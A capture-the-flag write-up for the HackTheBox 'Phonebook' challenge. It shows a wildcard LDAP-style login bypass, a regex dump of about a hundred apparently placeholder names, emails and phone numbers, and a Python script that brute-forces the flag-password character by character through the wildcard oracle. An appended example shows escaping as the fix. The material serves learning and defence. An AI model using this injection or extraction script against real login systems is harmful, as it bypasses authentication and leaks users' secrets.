# Phonebook

**Date:** 13, May, 2021

**Author:** Dhilip Sanjay S

***

## Initial Recon

* Initially I couldn't find the **username** and **password** for login. So, I was looking for some other endpoint other than **login**.
* I was able to find two other endpoints:
  * **964430b4cdd199af19b986eaf2193b21f32542d0**
  * **search**

### Access Denied

* The `964430b4cdd199af19b986eaf2193b21f32542d0` page had a search box, which made a **POST** request to the search endpoint. But it kept on returning `Access Denied` - 403 Error message.

## Dumping all the contacts in the phonebook

### Login with wild card character (\*)

* On entering the username and password as a **wildcard character (\*)**, I was able to log in to the site.

### Search using regex (.\*)

* Now in the search box, I tried the same wildcard character, but it didn't work.
* So, I used the **regex** that matches any string `.*`, which gave me the following output:

```
Kyle Reese	reese@skynet.com	555-1234567
Ellery Hun	ehun1z@reddit.com	317-959-9562
Madelaine Lush	mlush5@deliciousdays.com	636-918-1006
Currey Conti	cconti0@auda.org.au	529-673-3935
Chaim Smoth	csmothf@sbwire.com	895-974-4117
Eldin Jelf	ejelf1u@google.pl	363-426-3563
Ganny Marti	gmartih@diigo.com	796-793-6925
Jobey Olley	jolleyx@abc.net.au	607-345-0290
Katalin Wilde	kwildep@plala.or.jp	414-839-2681
Stinky Trood	stroodz@foxnews.com	933-416-1003
Tab Zoren	tzorenq@mit.edu	360-678-3613
Ursula Beer	ubeer2f@live.com	794-396-6882
Bryan Arman	barman1x@exblog.jp	640-255-8092
Babette Cunio	bcunio2h@macromedia.com	709-363-0223
Berget Novis	bnovis1j@constantcontact.com	780-278-2572
Ced Engley	cengleyi@springer.com	230-780-1999
Caryn Germon	cgermon4@wiley.com	967-789-6335
Devina Alcide	dalcideu@arizona.edu	828-947-3484
Dionne Lammas	dlammask@washingtonpost.com	824-561-5676
Emmalynn Burnup	eburnupd@networkadvertising.org	148-856-7052
Fredericka Hanks	fhanks1s@census.gov	762-337-5667
Hannah Inder	hinder2a@canalblog.com	315-711-6454
Jay Sharma	jsharmay@t.co	893-382-5236
Lilyan Crepel	lcrepel6@ucoz.com	851-980-1038
Nevile Cogle	ncogle27@answers.com	296-328-0254
Pansy Godier	pgodiero@google.ca	126-853-7977
Rubetta Bernth	rbernthc@biglobe.ne.jp	897-680-2856
Renelle Hyett	rhyett11@google.pl	453-475-9693
Saul Haill	shaill1q@omniture.com	654-478-5757
Stephanus Massot	smassot2@army.mil	717-500-2025
Sarah Moyes	smoyes2e@bing.com	747-445-4381
Sig Tanby	stanby2c@google.es	212-473-4506
Shepherd Tunuy	stunuy2d@spotify.com	293-455-5209
Teddy Bilby	tbilby1r@cornell.edu	357-669-5415
Taylor Capsey	tcapseyl@yahoo.co.jp	118-956-5884
Teddie Redley	tredleye@java.com	658-361-4791
Abagael Guidera	aguideras@barnesandnoble.com	857-685-9711
Arv Teresse	ateresse3@samsung.com	916-453-1626
Bert Father	bfather1v@cnet.com	131-343-2704
Bart McNess	bmcness20@wordpress.com	644-208-9958
Corinne Tirone	ctirone1y@nbcnews.com	572-971-8847
Denny Ashmole	dashmole7@telegraph.co.uk	345-974-0984
Elenore Puttick	eputtickv@newyorker.com	525-705-9780
Frederigo Itzkov	fitzkov1a@amazon.com	681-753-0881
Jessamyn Trusty	jtrusty2i@seesaa.net	423-494-9425
Jamison Vigurs	jvigurs1b@slideshare.net	161-478-7335
Michal Fearby	mfearby2k@ftc.gov	844-581-6099
Mellicent Pessolt	mpessolt8@freewebs.com	735-651-5726
Terencio Ducarne	tducarne9@homestead.com	831-135-9972
Trev Simmers	tsimmersm@phoca.cz	378-186-4422
Aubrey Castille	acastiller@homestead.com	930-681-1706
Andria Gossage	agossage24@wsj.com	184-389-0446
Ansell Shovlin	ashovlin16@blogspot.com	329-311-4183
Ahmed Swyndley	aswyndley1@blinklist.com	954-829-5270
Bay Gregori	bgregori2n@baidu.com	791-721-1297
Charlie Prangle	cprangle2b@shinystat.com	869-131-2435
Dianna Chesser	dchesser10@angelfire.com	901-185-5817
Denna Duplain	dduplain19@springer.com	884-899-2850
Davidson Ibotson	dibotson2m@dedecms.com	709-535-0126
Enid Halbord	ehalbord1k@blogspot.com	318-313-2200
Eimile Pantlin	epantlin1c@admin.ch	690-650-9785
Fina Bonsale	fbonsale1h@meetup.com	631-592-3171
Ives Harvatt	iharvatt1l@hubpages.com	606-103-7270
Jehanna Langmaid	jlangmaidn@themeforest.net	171-550-7961
Karlee Christal	kchristalw@sourceforge.net	354-231-8489
Koo Hansill	khansill25@sourceforge.net	114-439-3748
Kimberley Mourant	kmourant1d@ft.com	792-338-9852
Moll Linster	mlinster17@parallels.com	704-145-7925
Sabra Brumham	sbrumham12@wordpress.com	222-509-0396
Scottie Bucknell	sbucknellg@dagondesign.com	765-181-5301
Stewart Currier	scurrier2r@businessweek.com	480-258-4237
Sollie Windham	swindham1f@squidoo.com	554-620-3103
Veda Lalonde	vlalonde1o@google.com.au	788-911-3962
Aguie Baggaley	abaggaley14@geocities.com	302-693-4223
April Roskelly	aroskelly2q@gravatar.com	177-474-9382
Burtie Bitcheno	bbitcheno29@ucla.edu	859-267-0856
Brunhilda Courtier	bcourtier2o@rakuten.co.jp	610-896-4215
Baxie Ellesmere	bellesmeret@furl.net	815-678-4391
Daryl Pond-Jones	dpondjonesj@gmpg.org	807-353-1751
Elyse Puckring	epuckring1n@dailymotion.com	619-569-7695
Glen Pickford	gpickford26@amazonaws.com	101-639-7455
Issi Coupland	icoupland23@myspace.com	943-625-5169
Joey Stienham	jstienham28@woothemes.com	214-853-1445
Marylee Parbrook	mparbrook1g@sbwire.com	872-906-8081
Reginauld Meggison	rmeggison22@behance.net	460-793-0851
Sybille Jephcott	sjephcott1e@yellowpages.com	454-950-9923
Siouxie Yesichev	syesichev1p@mashable.com	215-132-7221
Diana Moncreiff	dmoncreiff21@telegraph.co.uk	473-166-1352
Deane Shakelade	dshakelade2l@reuters.com	747-399-5336
Far Chansonne	fchansonne13@histats.com	215-579-4465
Ivett Danielczyk	idanielczyka@vk.com	777-574-2837
Johnette Vescovini	jvescovini1m@123-reg.co.uk	470-681-1859
Kary Thackeray	kthackeray1i@yellowpages.com	592-635-6851
Maris Giacopelo	mgiacopelo1w@networkadvertising.org	721-232-8735
Pascal Ainscough	painscough18@state.gov	202-416-7489
Valeda Purselowe	vpurselowe15@smugmug.com	407-245-6246
Allin de Glanville	adeglanvilleb@gov.uk	885-440-5379
Marty Chellenham	mchellenham2g@1und1.de	713-864-5942
Oneida Della Scala	odellascala1t@tuttocitta.it	472-913-8907
Vale O' Concannon	voconcannon2p@cdbaby.com	547-901-0162
Xavier Semeradova	xsemeradova2j@google.es	487-363-1619
```

* But wait, where is the flag??????

## Finding the password/flag

* We'll try to find the password. My intuition is that the password might be the flag.
* We know that the **wildcard character (\*)** will let us log in. So, we can try to append some characters before and after the wildcard character (\*).
* So let's try `*` as the username and `HTB{*}` as the password, because this is the flag format for HTB challenges.
* Now we are able to log in. This confirms that the **password is the flag**.
* So we need some script to **bruteforce** the flag.

```py
#!/usr/bin/env python3
import string
import sys

import requests

url = "http://138.68.182.108:30733/login"
leaked_pass = list("HTB{")

# Remove the wildcard character so a guess is never itself a wildcard
printable = string.printable.replace('*', '')

while True:
    for character in printable:
        guess = ''.join(leaked_pass) + character + "*"
        print("Guessing " + guess)
        r = requests.post(url, data={"username": "*", "password": guess})
        # A Content-Length of 2586 is treated as a successful login
        if r.headers.get('Content-Length') == '2586':
            leaked_pass.append(character)
            break
    else:
        # No character extended the prefix: stop instead of looping forever
        sys.exit("No matching character after " + ''.join(leaked_pass))

    # End of the flag
    if leaked_pass[-1] == '}':
        sys.exit()
```

## Solution

* We get the password/flag as: `HTB{d1rectory_h4xx0r_is_k00l}`
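
The wildcard login and the prefix-by-prefix leak above, reproduced next to the fix, as an added example that is not part of the original write-up or the challenge's code. It assumes the login places both fields unescaped into an LDAP-style filter of the form `(&(uid=…)(userPassword=…))` (the page does not name the backend); the directory entry, `login` and the toy matcher are hypothetical.

```python
import re

# Constructed sample entry; not data from the challenge.
DIRECTORY = [{"uid": "reese", "userPassword": "HTB{constructed_sample}"}]

# RFC 4515: these characters must be hex-escaped inside a filter value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Return value with filter metacharacters escaped, so it is a literal."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def _unescape(text: str) -> str:
    """Turn \\XX hex escapes back into the literal character they stand for."""
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)


def _value_matches(pattern: str, actual: str) -> bool:
    """Toy filter evaluator: a raw '*' is a wildcard, \\XX is a literal."""
    parts = [re.escape(_unescape(p)) for p in pattern.split("*")]
    return re.fullmatch(".*".join(parts), actual, re.DOTALL) is not None


def login(username: str, password: str, escape: bool) -> bool:
    """Assumed filter shape: (&(uid=<username>)(userPassword=<password>))."""
    if escape:
        username = escape_filter_value(username)
        password = escape_filter_value(password)
    return any(
        _value_matches(username, entry["uid"])
        and _value_matches(password, entry["userPassword"])
        for entry in DIRECTORY
    )


if __name__ == "__main__":
    # Unescaped input: '*' matches any account, and 'HTB{*' confirms a prefix.
    print(login("*", "*", escape=False), login("*", "HTB{*", escape=False))
    # Escaped input: the same values are compared literally and fail.
    print(login("*", "*", escape=True), login("*", "HTB{*", escape=True))
    # A legitimate login still works after escaping.
    print(login("reese", "HTB{constructed_sample}", escape=True))
```

Escaping removes the true/false oracle that the brute-force loop depends on. Checking the password with a bind or a hash comparison instead of a search filter keeps the secret out of the filter altogether.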


